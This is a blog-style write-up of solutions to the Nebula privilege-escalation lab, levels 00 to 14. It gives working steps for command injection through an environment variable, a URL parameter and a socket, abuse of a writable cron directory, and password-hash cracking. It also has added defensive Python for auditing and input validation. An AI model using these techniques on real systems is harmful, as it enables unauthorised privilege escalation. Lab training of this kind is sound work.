Saturday, 30 November 2013

Privilege escalation

First step: reconnaissance.
Who am I?
id
Where am I?
pwd
What is in there?
ls -al
Which system is this?
uname -a
cat /etc/*release*

----

Sources:

http://insidetrust.blogspot.hu/2011/04/quick-guide-to-linux-privilege.html

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

http://www.rebootuser.com/?p=1623

https://www.netspi.com/blog/entryid/112/windows-privilege-escalation-part-1-local-administrator-privileges

Automated checkers:

http://pentestmonkey.net/tools/audit/unix-privesc-check

http://www.rebootuser.com/?p=1758

Challenges:

http://exploit-exercises.com/nebula

level00

find / -perm -4000 -type f 2>/dev/null
/bin/.../flag00

level01

Here I didn't quite understand what needed to be done, so I looked at a solution - after that it was simpler...

http://www.mattandreko.com/2011/12/02/exploit-exercises-nebula-01/

level02

cd /home/flag02
USER="a && /bin/bash && "
./flag02
getflag

level03

vi /home/level03/test
#!/bin/bash
getflag > /tmp/out

cp /home/level03/test writeable.d

... (wait 1 minute)
cat /tmp/out
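As an added, defender-side counterpart to the level00 and level03 steps above (this is example code written for this page, not code from the original post or from the Nebula project): the first function is the setuid search from level00 done in Python, the second checks whether cron-run directories and the scripts inside them are writable by other users, which is exactly the misconfiguration level03 relies on. The paths in CRON_DIRS are the usual Debian/Ubuntu locations and are an assumption; the sample tree is constructed only for the demonstration.

```python
import os
import stat
import tempfile

# Typical cron script directories on Debian/Ubuntu (assumed); the Nebula level03
# "writeable.d" is a challenge-specific directory run from flag03's crontab.
CRON_DIRS = ["/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily",
             "/etc/cron.weekly", "/etc/cron.monthly"]


def find_setuid(root="/"):
    """Equivalent of `find / -perm -4000 -type f`: regular files with the setuid bit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def writable_by_others(path):
    """True if group or world has write permission (the level03 weakness)."""
    return bool(os.lstat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_dirs(dirs=CRON_DIRS):
    """Report cron directories and scripts that another user could modify or replace."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        if writable_by_others(d):
            findings.append((d, "cron directory writable by group/other"))
        for name in sorted(os.listdir(d)):
            path = os.path.join(d, name)
            if os.path.islink(path):
                findings.append((path, "symlink inside cron directory"))
            elif writable_by_others(path):
                findings.append((path, "cron script writable by group/other"))
    return findings


def make_sample_tree():
    """Constructed fixture: a tiny tree with one setuid file and one writable cron script."""
    base = tempfile.mkdtemp(prefix="privesc-audit-")
    cron = os.path.join(base, "cron.d")
    os.mkdir(cron)
    os.chmod(cron, 0o755)
    for name, mode in (("good", 0o755), ("bad", 0o777)):
        path = os.path.join(cron, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    suid = os.path.join(base, "flag00")
    open(suid, "w").close()
    os.chmod(suid, 0o4755)  # setuid bit on a file we own
    return base


if __name__ == "__main__":
    for path in find_setuid("/"):
        print("setuid:", path)
    for path, why in audit_cron_dirs():
        print("cron:", path, "-", why)
```

Run as-is it walks the real filesystem; the fixture function exists so the two checks can be exercised on a throwaway directory first.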

level04

cd /home/flag04
ln -s /home/flag04/token /home/level04/t
./flag04 /home/level04/t
06508b5e-8909-4f38-b630-fdb148a848a2

level05

cd /home/flag05
ls -al
ls -al .backup
cp .backup/b* /home/level05
cd /home/level05
tar xvzf backup-19072011.tgz
ssh flag05@192.168.56.101 -i .ssh/id_rsa
getflag

level06

ls -al /home/flag06
grep flag06 /etc/passwd

create a.pas containing the flag06 line from /etc/passwd:
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

john a.pas
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 15687  trying: 123456 - marley

exit
nebula login: flag06
Password: hello
getflag

level07

cd /home/flag07
more thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101

PING 192.168.56.101 (192.168.56.101) 56(84) bytes of data.
64 bytes from 192.168.56.101: icmp_req=1 ttl=64 time=0.020 ms
64 bytes from 192.168.56.101: icmp_req=2 ttl=64 time=0.050 ms
64 bytes from 192.168.56.101: icmp_req=3 ttl=64 time=0.056 ms

--- 192.168.56.101 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.020/0.042/0.056/0.015 ms

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20ls%20-al

total 10
drwxr-x--- 2 flag07 level07  102 Nov 20  2011 .
drwxr-xr-x 1 root   root     260 Aug 27  2012 ..
-rw-r--r-- 1 flag07 flag07   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag07 flag07  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag07 flag07   675 May 18  2011 .profile
-rwxr-xr-x 1 root   root     368 Nov 20  2011 index.cgi
-rw-r--r-- 1 root   root    3719 Nov 20  2011 thttpd.conf

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20id

uid=992(flag07) gid=992(flag07) groups=992(flag07)

http://192.168.56.101:7007/index.cgi?Host=192.168.56.101|%20getflag

You have successfully executed getflag on a target account
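The level07 step shows an unvalidated Host parameter reaching a shell. As an added example (written for this page in Python; index.cgi's own source is not shown here and this is not the challenge's code), the block below puts the shell-interpolating pattern next to a hardened form that allow-lists the value and passes it as a single argv element without a shell, and adds a small log check that flags requests like the ones above. The access-log lines are constructed in common log format; thttpd's real log layout is not taken from the page.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus, urlsplit

# Hostname labels: letters, digits and hyphens, no leading/trailing hyphen, dot-separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
SHELL_META = set("|;&$`<>(){}\\'\"\n\r*?")


def is_valid_host(value):
    """Allow-list check: an IP literal or a well-formed hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None


def vulnerable_ping_command(host):
    """Shell-interpolating pattern (assumed to resemble index.cgi, whose source is
    not on this page): the raw parameter becomes part of a /bin/sh command line."""
    return "ping -c 3 " + host


def safe_ping_argv(host):
    """Hardened form: validate first, then hand the value over as one argv element."""
    if not is_valid_host(host):
        raise ValueError("rejected Host parameter: %r" % host)
    return ["ping", "-c", "3", host]


def run_ping(host):
    """Runs the hardened form; a list argv is executed directly, never via a shell."""
    proc = subprocess.run(safe_ping_argv(host), capture_output=True, text=True, timeout=15)
    return proc.stdout


def host_params(request_path):
    """Yield decoded Host query values without relying on parse_qs separator rules."""
    for pair in urlsplit(request_path).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "Host":
            yield unquote_plus(value)


def suspicious_requests(log_lines):
    """Flag log lines whose Host parameter holds shell metacharacters or is not a host."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        for value in host_params(m.group(1)):
            if SHELL_META & set(value) or not is_valid_host(value):
                hits.append((line, value))
    return hits


# Constructed access-log lines (common log format); the values mirror the requests above.
SAMPLE_LOG = [
    '192.168.56.1 - - [30/Nov/2013:10:00:01 +0100] "GET /index.cgi?Host=192.168.56.101 HTTP/1.1" 200 512',
    '192.168.56.1 - - [30/Nov/2013:10:00:07 +0100] "GET /index.cgi?Host=192.168.56.101|%20id HTTP/1.1" 200 88',
    '192.168.56.1 - - [30/Nov/2013:10:00:12 +0100] "GET /index.cgi?Host=192.168.56.101|%20getflag HTTP/1.1" 200 60',
]

if __name__ == "__main__":
    print(safe_ping_argv("192.168.56.101"))
    for line, value in suspicious_requests(SAMPLE_LOG):
        print("suspicious Host parameter:", repr(value))
```

The allow-list is the real fix; the metacharacter scan is only a detection aid, so the log check also rejects anything that fails the same validation the CGI should apply.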

level08

cd /home/flag08
ls -al
cp capture.pcap /home/level08
cd /home/level08
scp capture.pcap user@192.168.56.102:.

wireshark capture.pcap

Follow TCP Stream

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b.....B.
..............................1.......!.."......"......!..........."........".."................
.....................

Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)


..wwwbugs login: l.le.ev.ve.el.l8.8
..

Password: backdoor...00Rm8.ate
.

..

Login incorrect

wwwbugs login:



backdoor...00Rm8.ate

000000B9  62                                               b
000000BA  61                                               a
000000BB  63                                               c
000000BC  6b                                               k
000000BD  64                                               d
000000BE  6f                                               o
000000BF  6f                                               o
000000C0  72                                               r
000000C1  7f                                               .
000000C2  7f                                               .
000000C3  7f                                               .
000000C4  30                                               0
000000C5  30                                               0
000000C6  52                                               R
000000C7  6d                                               m
000000C8  38                                               8
000000C9  7f                                               .
000000CA  61                                               a
000000CB  74                                               t
000000CC  65                                               e
000000CD  0d                                               .

7f = DEL (delete), each one erases the previous character

backd00Rmate

nebula login: flag08
Password: backd00Rmate

getflag
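The level08 step reconstructs what was typed from the raw bytes by applying each 0x7f as an erase. As an added example (written for this page, not code from the original post or from the Nebula project), the block below does that mechanically: it parses Wireshark's hex-dump lines into bytes and replays the keystrokes, honouring DEL and Backspace and stopping at Enter. The dump text is the page's own hex dump, embedded as a constructed sample; the assumption is that the ASCII column of a dump line is separated from the hex column by three or more spaces, as in Wireshark's layout.

```python
import re

# Constructed sample: the keystroke bytes from the level08 capture, in the
# one-byte-per-line layout of the Wireshark "Follow TCP Stream" hex dump above.
CAPTURED_DUMP = """\
000000B9  62                                               b
000000BA  61                                               a
000000BB  63                                               c
000000BC  6b                                               k
000000BD  64                                               d
000000BE  6f                                               o
000000BF  6f                                               o
000000C0  72                                               r
000000C1  7f                                               .
000000C2  7f                                               .
000000C3  7f                                               .
000000C4  30                                               0
000000C5  30                                               0
000000C6  52                                               R
000000C7  6d                                               m
000000C8  38                                               8
000000C9  7f                                               .
000000CA  61                                               a
000000CB  74                                               t
000000CC  65                                               e
000000CD  0d                                               .
"""

DEL, BS = 0x7F, 0x08        # erase keys: DEL (what this capture uses) and Backspace
LINE_END = (0x0D, 0x0A)     # Enter: CR or LF terminates the typed line


def parse_wireshark_hexdump(text):
    """Turn hex-dump lines (offset, hex pairs, ASCII column) into raw bytes.

    Assumption: the ASCII column follows the hex column after at least three
    spaces, so splitting on that run keeps ASCII text from being read as hex.
    """
    data = bytearray()
    for line in text.splitlines():
        head = re.split(r" {3,}", line.rstrip(), maxsplit=1)[0]
        fields = head.split()
        if len(fields) < 2 or not re.fullmatch(r"[0-9A-Fa-f]+", fields[0]):
            continue  # not a dump line (heading, blank, etc.)
        data.extend(int(h, 16) for h in fields[1:] if re.fullmatch(r"[0-9A-Fa-f]{2}", h))
    return bytes(data)


def reconstruct_typed_line(raw):
    """Replay a raw keystroke stream, applying erase keys, up to the first Enter."""
    typed = []
    for b in raw:
        if b in (DEL, BS):
            if typed:
                typed.pop()          # erase key removes the previous character
        elif b in LINE_END:
            break                    # Enter: the line is complete
        elif 0x20 <= b < 0x7F:
            typed.append(chr(b))     # printable ASCII
        # other control bytes (telnet negotiation and the like) are ignored
    return "".join(typed)


def recover_typed_line(dump):
    return reconstruct_typed_line(parse_wireshark_hexdump(dump))


if __name__ == "__main__":
    print(parse_wireshark_hexdump(CAPTURED_DUMP))
    print(recover_typed_line(CAPTURED_DUMP))
```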

level09

This task was beyond my current knowledge :)

http://www.mattandreko.com/2011/12/10/exploit-exercises-nebula-09/

level10

ls -al
more .viminfo
strings x

This was a hard challenge, but since I got hold of the required code in two steps, I didn't wear myself out with it (of course I checked what the real solution to the exercise is, but in the end, if it works the easier way, I don't bother with the harder route).

http://www.mattandreko.com/2011/12/11/exploit-exercises-nebula-10/

http://www.pedramhayati.com/2012/02/01/nebula-level10-solution/

level11

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level12

telnet 127.0.0.1 5001
| ls -al > /tmp/a

cat /tmp/a

telnet 127.0.0.1 5001
| getflag > /tmp/b

cat /tmp/b

level13

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

level14

cd /home/flag14
cat token
./flag14
aaaaaaaaaaaaaaaaaaaa
abcdefghijklmnopqrst

vi /home/level14/decode.pl

#!/usr/bin/perl
use strict;
use warnings;

# Reverse the flag14 encoding seen above: character i of the output has i
# added to it, so subtract each character's position to get the token back.
while (my $line = <STDIN>) {
    chomp($line);
    my $len = length($line);
    for (my $i = 0; $i < $len; $i++) {
        my $y = substr($line, $i, 1);
        my $x = ord($y);
        print chr($x - $i);
    }
}

cat token | perl /home/level14/decode.pl
8457c118-887c-4e40-a5a6-33a25353165

level15-level19

http://forelsec.blogspot.co.uk/2013/03/nebula-solutions-all-levels.html

I didn't feel like going into these now. Besides, they were beyond my current level of preparation.
Next up are the Privilege Escalation challenges..... Now I'm going to dig into this area a bit.
